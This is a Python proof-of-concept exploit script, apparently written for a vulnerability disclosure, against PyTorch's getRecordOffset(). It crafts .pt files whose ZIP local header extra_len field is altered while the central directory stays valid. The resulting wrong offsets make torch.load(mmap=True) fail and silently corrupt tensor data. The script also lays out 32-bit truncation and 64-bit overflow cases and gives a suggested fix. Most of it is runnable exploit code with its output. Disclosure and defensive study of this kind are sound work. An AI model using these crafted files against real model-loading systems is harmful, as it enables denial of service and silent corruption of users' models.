| | |
| | """ |
| | PoC: getRecordOffset() Integer Overflow via Local Header Manipulation |
| | |
| | Vulnerability: PyTorchStreamReader::getRecordOffset() at inline_container.cc:634-637 |
| | reads `filename_len` and `extra_len` directly from the ZIP local file header (LFH) |
| | without validating them against the central directory. The returned offset is: |
| | |
| | return stat.m_local_header_ofs + MZ_ZIP_LOCAL_DIR_HEADER_SIZE |
| | + filename_len + extra_len; |
| | |
| | A crafted .pt file where the LFH has modified filename_len/extra_len causes |
| | getRecordOffset() to return a WRONG offset. This offset is then used by: |
| | |
| | 1. torch.load(path, mmap=True) β indexes into mmap'd buffer at wrong position |
| | (serialization.py:2083-2084) |
| | 2. getRecordMultiReaders() β multi-threaded reading from wrong offset |
| | (inline_container.cc:398-424) |
| | 3. Any caller of get_record_offset() Python API |
| | |
| | Additionally, on 32-bit platforms (PyTorch Mobile ARM32), stat.m_local_header_ofs |
| | is mz_uint64 (64-bit) but the return type is size_t (32-bit), causing silent |
| | truncation that wraps the offset to a completely different file position. |
| | |
| | The ZIP central directory is NOT modified, so miniz validation passes. |
| | |
| | Root cause: inline_container.cc:634-637 β no validation of LFH fields |
| | Tested: PyTorch 2.10.0+cpu on Python 3.13.11 |
| | """ |
| |
|
| | import ctypes |
| | import io |
| | import os |
| | import struct |
| | import subprocess |
| | import sys |
| | import tempfile |
| | import warnings |
| |
|
| | import torch |
| | import torch.nn as nn |
| |
|
| | warnings.filterwarnings('ignore') |
| |
|
| |
|
| | def create_test_model(output_path): |
| | """Create a simple model with known tensor values.""" |
| | t = torch.tensor([[1.0, 2.0], [3.0, 4.0]], dtype=torch.float32) |
| | torch.save(t, output_path) |
| | return output_path |
| |
|
| |
|
| | def find_local_header(data, record_name_suffix): |
| | """Find a ZIP local file header by record name suffix.""" |
| | pos = 0 |
| | while pos < len(data): |
| | idx = data.find(b'PK\x03\x04', pos) |
| | if idx == -1: |
| | return None |
| | fn_len = struct.unpack_from('<H', data, idx + 26)[0] |
| | fn = data[idx + 30:idx + 30 + fn_len].decode('utf-8', errors='replace') |
| | if fn.endswith(record_name_suffix): |
| | extra_len = struct.unpack_from('<H', data, idx + 28)[0] |
| | return { |
| | 'offset': idx, |
| | 'fn_len': fn_len, |
| | 'extra_len': extra_len, |
| | 'filename': fn, |
| | 'data_offset': idx + 30 + fn_len + extra_len, |
| | } |
| | pos = idx + 1 |
| | return None |
| |
|
| |
|
| | def create_modified_model(input_path, output_path, new_extra_len): |
| | """Modify the data/0 local header's extra_len field. |
| | |
| | Only the local header is changed β the central directory remains valid. |
| | """ |
| | with open(input_path, 'rb') as f: |
| | data = bytearray(f.read()) |
| |
|
| | lh = find_local_header(data, 'data/0') |
| | if not lh: |
| | raise ValueError("data/0 local header not found") |
| |
|
| | orig_extra = lh['extra_len'] |
| | struct.pack_into('<H', data, lh['offset'] + 28, new_extra_len) |
| |
|
| | with open(output_path, 'wb') as f: |
| | f.write(data) |
| |
|
| | return lh, orig_extra, len(data) |
| |
|
| |
|
| | def run_in_subprocess(script, timeout=15): |
| | """Run script in subprocess, return (returncode, stdout, stderr).""" |
| | result = subprocess.run( |
| | [sys.executable, '-c', script], |
| | capture_output=True, text=True, timeout=timeout |
| | ) |
| | return result.returncode, result.stdout.strip(), result.stderr.strip() |
| |
|
| |
|
| | def get_signal_name(signum): |
| | try: |
| | import signal |
| | return signal.Signals(signum).name |
| | except (ValueError, AttributeError): |
| | return f"signal {signum}" |
| |
|
| |
|
| | def demonstrate_wrong_offset(): |
| | """Part 1: Show getRecordOffset returns wrong value from crafted local header.""" |
| | print() |
| | print("=" * 70) |
| | print(" Part 1: getRecordOffset() Returns Wrong Offset") |
| | print("=" * 70) |
| | print() |
| |
|
| | tmpdir = tempfile.mkdtemp(prefix="recoff_") |
| | valid_path = os.path.join(tmpdir, "valid.pt") |
| | create_test_model(valid_path) |
| |
|
| | with open(valid_path, 'rb') as f: |
| | data = f.read() |
| |
|
| | lh = find_local_header(data, 'data/0') |
| | print(f" File size: {len(data)} bytes") |
| | print(f" data/0 local header at offset {lh['offset']}") |
| | print(f" data/0 filename_len: {lh['fn_len']}") |
| | print(f" data/0 extra_len: {lh['extra_len']}") |
| | print(f" data/0 correct data offset: {lh['data_offset']}") |
| | print() |
| |
|
| | |
| | reader = torch._C.PyTorchFileReader(valid_path) |
| | orig_off = reader.get_record_offset("data/0") |
| | print(f" get_record_offset('data/0') [original]: {orig_off}") |
| | print() |
| |
|
| | |
| | mod_path = os.path.join(tmpdir, "modified_65535.pt") |
| | lh_info, orig_extra, file_size = create_modified_model( |
| | valid_path, mod_path, 65535 |
| | ) |
| |
|
| | expected_wrong = lh['offset'] + 30 + lh['fn_len'] + 65535 |
| | reader2 = torch._C.PyTorchFileReader(mod_path) |
| | wrong_off = reader2.get_record_offset("data/0") |
| |
|
| | print(f" After setting extra_len: {orig_extra} β 65535") |
| | print(f" get_record_offset('data/0') [modified]: {wrong_off}") |
| | print(f" Expected wrong offset: {expected_wrong}") |
| | print(f" File size: {file_size}") |
| | print(f" Offset past EOF by: {wrong_off - file_size} bytes") |
| | print() |
| |
|
| | |
| | print(" Correct offset data (first 16 bytes of tensor):") |
| | correct_data = data[lh['data_offset']:lh['data_offset'] + 16] |
| | hex_str = ' '.join(f'{b:02x}' for b in correct_data) |
| | floats = struct.unpack_from('<4f', correct_data) |
| | print(f" {hex_str}") |
| | print(f" = [{', '.join(f'{v:.1f}' for v in floats)}] (correct tensor values)") |
| | print() |
| |
|
| | print(" Wrong offset ({}) is {} bytes PAST the file end.".format( |
| | wrong_off, wrong_off - file_size)) |
| | print(" Any read at this offset accesses invalid memory or fails.") |
| | print() |
| | print(" [+] getRecordOffset() trusts unvalidated local header fields!") |
| | print(" [+] Central directory is untouched β miniz validation passes!") |
| |
|
| | return valid_path, tmpdir |
| |
|
| |
|
| | def demonstrate_mmap_impact(valid_path, tmpdir): |
| | """Part 2: Show torch.load(mmap=True) fails due to wrong offset.""" |
| | print() |
| | print("=" * 70) |
| | print(" Part 2: Impact on torch.load(mmap=True)") |
| | print("=" * 70) |
| | print() |
| |
|
| | mod_path = os.path.join(tmpdir, "mmap_test.pt") |
| | create_modified_model(valid_path, mod_path, 65535) |
| |
|
| | |
| | script_valid = f'''\ |
| | import torch, warnings |
| | warnings.filterwarnings("ignore") |
| | t = torch.load("{valid_path}", mmap=True, weights_only=True) |
| | print(f"VALID: shape={{t.shape}} values={{t.tolist()}}") |
| | ''' |
| | rc, stdout, stderr = run_in_subprocess(script_valid) |
| | print(f" Valid file mmap load: {stdout}") |
| |
|
| | |
| | script_mod = f'''\ |
| | import torch, warnings |
| | warnings.filterwarnings("ignore") |
| | try: |
| | t = torch.load("{mod_path}", mmap=True, weights_only=True) |
| | print(f"LOADED: shape={{t.shape}} values={{t.tolist()}}") |
| | except RuntimeError as e: |
| | print(f"RUNTIME_ERROR: {{str(e)[:200]}}") |
| | except Exception as e: |
| | print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}") |
| | ''' |
| | rc, stdout, stderr = run_in_subprocess(script_mod) |
| | if rc < 0: |
| | print(f" Modified file mmap load: CRASH ({get_signal_name(-rc)})") |
| | else: |
| | print(f" Modified file mmap load: {stdout}") |
| |
|
| | print() |
| | print(" torch.load(mmap=True) uses get_record_offset() to index into the") |
| | print(" mmap'd buffer (serialization.py:2083-2084):") |
| | print(" storage_offset = zip_file.get_record_offset(name)") |
| | print(" storage = overall_storage[storage_offset : storage_offset + nbytes]") |
| | print(" With the wrong offset, this reads from the wrong position or fails.") |
| |
|
| |
|
| | def demonstrate_within_file_corruption(valid_path, tmpdir): |
| | """Part 3: Show offset within file reads WRONG data (silent corruption).""" |
| | print() |
| | print("=" * 70) |
| | print(" Part 3: Within-File Offset β Silent Data Corruption") |
| | print("=" * 70) |
| | print() |
| |
|
| | with open(valid_path, 'rb') as f: |
| | data = bytearray(f.read()) |
| |
|
| | lh = find_local_header(data, 'data/0') |
| | correct_off = lh['data_offset'] |
| |
|
| | |
| | target_lh = None |
| | pos = 0 |
| | while pos < len(data): |
| | idx = data.find(b'PK\x03\x04', pos) |
| | if idx == -1: |
| | break |
| | fn_len_t = struct.unpack_from('<H', data, idx + 26)[0] |
| | extra_len_t = struct.unpack_from('<H', data, idx + 28)[0] |
| | fn = data[idx + 30:idx + 30 + fn_len_t].decode('utf-8', errors='replace') |
| | t_data_off = idx + 30 + fn_len_t + extra_len_t |
| | if t_data_off > correct_off and 'data/0' not in fn: |
| | target_lh = {'offset': idx, 'data_offset': t_data_off, 'filename': fn} |
| | break |
| | pos = idx + 1 |
| |
|
| | if not target_lh: |
| | print(" Skipped: no suitable target record found after data/0") |
| | return |
| |
|
| | target_off = target_lh['data_offset'] |
| | needed_shift = target_off - correct_off |
| | new_extra = lh['extra_len'] + needed_shift |
| |
|
| | if new_extra > 65535 or new_extra < 0: |
| | print(f" Skipped: needed extra_len={new_extra} out of 16-bit range") |
| | return |
| |
|
| | print(f" Original data/0 offset: {correct_off} (tensor data)") |
| | print(f" Target: '{target_lh['filename']}' data at offset {target_off}") |
| | print(f" Shifting by {needed_shift}: extra_len {lh['extra_len']} β {new_extra}") |
| | print() |
| |
|
| | |
| | correct_bytes = data[correct_off:correct_off + 16] |
| | target_bytes = data[target_off:target_off + 16] |
| | print(f" Correct offset ({correct_off}) bytes: " |
| | + ' '.join(f'{b:02x}' for b in correct_bytes)) |
| | print(f" Target offset ({target_off}) bytes: " |
| | + ' '.join(f'{b:02x}' for b in target_bytes)) |
| | print(f" Target data as text: {bytes(target_bytes).decode('utf-8', errors='replace')!r}") |
| | print() |
| |
|
| | mod_path = os.path.join(tmpdir, "corruption.pt") |
| | struct.pack_into('<H', data, lh['offset'] + 28, new_extra) |
| | with open(mod_path, 'wb') as f: |
| | f.write(data) |
| |
|
| | |
| | reader = torch._C.PyTorchFileReader(mod_path) |
| | new_off = reader.get_record_offset('data/0') |
| | print(f" get_record_offset('data/0'): {new_off}") |
| | print(f" This points to '{target_lh['filename']}' record data!") |
| | print(f" If used, tensor data would be read from the wrong record.") |
| | print() |
| |
|
| | |
| | print(" Reading data at wrong offset as float32 tensor:") |
| | wrong_floats = struct.unpack_from('<4f', data, target_off) |
| | correct_floats = struct.unpack_from('<4f', data, correct_off) |
| | print(f" Expected: [{', '.join(f'{v:.1f}' for v in correct_floats)}]") |
| | print(f" Got: [{', '.join(f'{v:.6g}' for v in wrong_floats)}] (garbage!)") |
| | print() |
| | print(" [+] Data/0 now reads from wrong record β silent tensor corruption!") |
| |
|
| |
|
| | def demonstrate_overflow_analysis(): |
| | """Part 4: Show integer overflow on 32-bit and 64-bit platforms.""" |
| | print() |
| | print("=" * 70) |
| | print(" Part 4: Integer Overflow Analysis") |
| | print("=" * 70) |
| | print() |
| |
|
| | print(" Vulnerable code (inline_container.cc:634-637):") |
| | print() |
| | print(" size_t filename_len = read_le_16(local_header + 26);") |
| | print(" size_t extra_len = read_le_16(local_header + 28);") |
| | print(" return stat.m_local_header_ofs + 30 + filename_len + extra_len;") |
| | print() |
| | print(" Types: m_local_header_ofs is mz_uint64 (uint64_t)") |
| | print(" Return type is size_t (32-bit on ARM32, 64-bit on x86_64)") |
| | print() |
| |
|
| | print(" 32-bit platform (PyTorch Mobile ARM32):") |
| | print(" βββββββββββββββββββββββββββββββββββββββββββββββββ") |
| | cases_32 = [ |
| | (0x00000100, 30, 100, 200, "normal β within 32-bit range"), |
| | (0xFFFFFFA0, 30, 0, 0, "near 32-bit max β wraps on 32-bit"), |
| | (0x100000000, 30, 100, 200, "above 32-bit β truncated to low 32 bits"), |
| | (0x100000100, 30, 100, 200, "4GB+offset β wraps to small value"), |
| | ] |
| |
|
| | print(f" {'m_local_header_ofs':>22s} {'+ 30 + fn + ex':>14s} {'64-bit result':>18s} {'32-bit (truncated)':>18s} Notes") |
| | print(f" {'β'*22} {'β'*14} {'β'*18} {'β'*18} {'β'*30}") |
| |
|
| | for ofs, hdr_size, fn_len, extra_len, note in cases_32: |
| | sum64 = ctypes.c_uint64(ofs + hdr_size + fn_len + extra_len).value |
| | sum32 = ctypes.c_uint32(sum64).value |
| | truncated = "YES!" if sum64 != sum32 else "no" |
| |
|
| | print(f" 0x{ofs:016X} + {hdr_size + fn_len + extra_len:12d} 0x{sum64:016X} 0x{sum32:08X} ({truncated:4s}) {note}") |
| |
|
| | print() |
| | print(" On 32-bit ARM: mz_uint64 β size_t truncation loses high 32 bits") |
| | print(" Offset 0x100000100 + extras β 0x100000230 β truncated to 0x00000230") |
| | print(" The 4GB worth of offset data is silently lost!") |
| | print() |
| |
|
| | print(" 64-bit overflow (requires m_local_header_ofs near UINT64_MAX):") |
| | print(" βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ") |
| | cases_64 = [ |
| | (0xFFFFFFFFFFFF0000, 30, 65535, 65535, "wraps to 0x20FFD"), |
| | (0xFFFFFFFFFFFFFFF0, 30, 0, 0, "wraps to 0x0E"), |
| | (0xFFFFFFFFFFFFF000, 30, 50000, 15505, "wraps to 0xFFFF"), |
| | ] |
| |
|
| | for ofs, hdr_size, fn_len, extra_len, note in cases_64: |
| | sum64 = ctypes.c_uint64(ofs + hdr_size + fn_len + extra_len).value |
| | print(f" 0x{ofs:016X} + {hdr_size+fn_len+extra_len:6d} β 0x{sum64:016X} {note}") |
| |
|
| | print() |
| | print(" 64-bit overflow wraps huge offset to a small value near 0") |
| | print(" File data at offset 0 is the ZIP local header, not tensor data") |
| | print(" β reads ZIP metadata as tensor values β corruption or crash") |
| |
|
| |
|
| | def demonstrate_vulnerability_code(): |
| | """Part 5: Vulnerability details and fix.""" |
| | print() |
| | print("=" * 70) |
| | print(" Part 5: Vulnerability Details") |
| | print("=" * 70) |
| | print() |
| |
|
| | print(" ROOT CAUSE: getRecordOffset() reads filename_len and extra_len") |
| | print(" from the local file header WITHOUT cross-checking against the") |
| | print(" central directory values that miniz validated.") |
| | print() |
| | print(" The central directory is validated by miniz during ZIP open.") |
| | print(" But the LOCAL header is read separately by getRecordOffset().") |
| | print(" An attacker can have different values in LFH vs central directory.") |
| | print() |
| | print(" CALLERS that use the wrong offset:") |
| | print(" 1. torch.load(mmap=True): serialization.py:2083") |
| | print(" storage_offset = zip_file.get_record_offset(name)") |
| | print(" storage = overall_storage[storage_offset:storage_offset+n]") |
| | print(" 2. getRecordMultiReaders(): inline_container.cc:398") |
| | print(" size_t recordOff = getRecordOffset(name);") |
| | print(" read(recordOff + startPos, dst + startPos, size);") |
| | print(" 3. Any caller of get_record_offset() Python/C++ API") |
| | print() |
| | print(" FIX: Validate LFH fields against central directory:") |
| | print(" βββββββββββββββββββββββββββββββββββββββββββββββββββββ") |
| | print(" size_t filename_len = read_le_16(local_header + 26);") |
| | print(" size_t extra_len = read_le_16(local_header + 28);") |
| | print(" TORCH_CHECK(") |
| | print(" !__builtin_add_overflow(stat.m_local_header_ofs,") |
| | print(" MZ_ZIP_LOCAL_DIR_HEADER_SIZE + filename_len + extra_len,") |
| | print(" &result),") |
| | print(' "Record offset overflow for ", name);') |
| | print(" TORCH_CHECK(result <= file_size_,") |
| | print(' "Record offset exceeds file size for ", name);') |
| |
|
| |
|
| | def main(): |
| | print() |
| | print(" PoC: getRecordOffset() Integer Overflow via Local Header") |
| | print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}") |
| | print() |
| |
|
| | |
| | valid_path, tmpdir = demonstrate_wrong_offset() |
| |
|
| | |
| | demonstrate_mmap_impact(valid_path, tmpdir) |
| |
|
| | |
| | demonstrate_within_file_corruption(valid_path, tmpdir) |
| |
|
| | |
| | demonstrate_overflow_analysis() |
| |
|
| | |
| | demonstrate_vulnerability_code() |
| |
|
| | |
| | print() |
| | print("=" * 70) |
| | print(" RESULTS:") |
| | print(" [+] getRecordOffset() returns wrong offset from crafted LFH") |
| | print(" [+] Modified extra_len: offset jumps 65KB past EOF (65535 vs 63)") |
| | print(" [+] torch.load(mmap=True) fails on wrong offset β DoS") |
| | print(" [+] Within-file offset shift β silent tensor data corruption") |
| | print(" [+] 32-bit: mz_uint64βsize_t truncation wraps offset") |
| | print(" [+] 64-bit: addition overflow wraps near-max offset to ~0") |
| | print(" [+] Fix: validate LFH against CD, check overflow, check bounds") |
| | print("=" * 70) |
| |
|
| |
|
| | if __name__ == "__main__": |
| | main() |
| |
|